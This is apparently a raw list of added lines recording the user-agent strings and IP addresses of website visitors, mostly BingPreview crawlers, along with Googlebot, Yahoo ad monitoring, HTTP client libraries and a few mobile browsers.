    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.214]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.54]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.115]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.117]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.75]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.91]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.68]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.186]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.236]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.162]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.241]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.82]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.74]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.145]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.219]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.73]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.150]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.124]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.68]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.212]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.126]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.154]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.107]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.114]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.95]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.254]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.72.83]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.193]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.142]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.31]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.59]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.30]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.2]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.230]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.108]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.49]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.161]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.218]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.77]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.201]
    +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/85.0.4183.140Safari/537.36 [ip:66.102.8.118]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.195]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.37]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.161]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.84]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.151]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.151]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.15]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.181]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.100]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.167]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.246]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.50]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.182]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.180]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.210]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.98]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.14]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.32]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.85]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.69]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.176]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.105]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.152]
    +WebCopier v4.6 [ip:213.32.4.247]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.116]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.65]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.178]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.92]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.37]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.143]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.169]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.134]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.244]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.9]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.191]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.79]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.128]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.57]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.119]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.92]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.94]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.139]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.217]
    +AdsBot-Google (+http://www.google.com/adsbot.html) [ip:66.249.89.88]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.242]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.76]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.62]
    +WhatsApp/2.2045.19 N
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605183533-0
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.220]
    +python-requests/2.25.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605150397-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605150412-10
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.44]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.204]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.100]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.213]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.50]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.36]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.198]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.112]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.238]
    +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) [ip:66.249.89.88]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.67]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.138]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605214687-10
    +yacybot (/global; amd64 Linux 4.19.0-11-amd64; java 1.8.0_212; GMT/en) http://yacy.net/bot.html
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605220367-10
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.107]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1605143073-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605151226-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605151199-0
    +WordPress/5.4.4; https://businessguarantor.com/tr
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Edg/85.0.564.68
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605169245-0
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.86]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.223]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.151]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.60]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-demand/1605149251-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-demand/1605149252-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-demand/1605156152-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Mobile Safari/537.36 PTST/201110.231138
    +CURL (Link validity checker)
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1605163222-60
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 4.1.2; GT-P3100 ) U2/1.0.0 Mobile
    +GuzzleHttp/6.5.5 curl/7.47.0 PHP/7.4.10
    +FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)+Gecko/20100101 Firefox/74.0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.9.856 (SpeedMode; Proxy; Android 6.0.1; SM-G532G ) U2/1.0.0 Mobile
    +PostmanRuntime/7.26.8
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.26]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605211739-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605211740-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605211742-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605211741-10
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.172]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.120]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.127]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.143]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.87]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.204]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.82]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.116]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.28]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.239]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.139]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.130]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.98]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.61]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.41]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.179]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.201]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.114]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.121]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.237]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.189]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.150]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.64.156]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.64.154]
    +okhttp/3.11.0 [ip:37.161.193.70]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.12]
    +okhttp/3.12.5 [ip:83.99.94.197]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.161]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.196]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.46]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.170]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.253]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.148]
    +okhttp/3.12.5 [ip:151.57.161.88]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.119]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.197]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.150]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.33]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.42]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.166]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.18]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.154]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.177]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.238]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.42]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.231]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.126]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.117]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.198]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.135]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.99]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.19]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.15]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.103]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.24]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.73]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.135]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.48]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.64]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.104]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.156]
    +Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0 [ip:213.32.4.245]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.247]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.53]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.76]
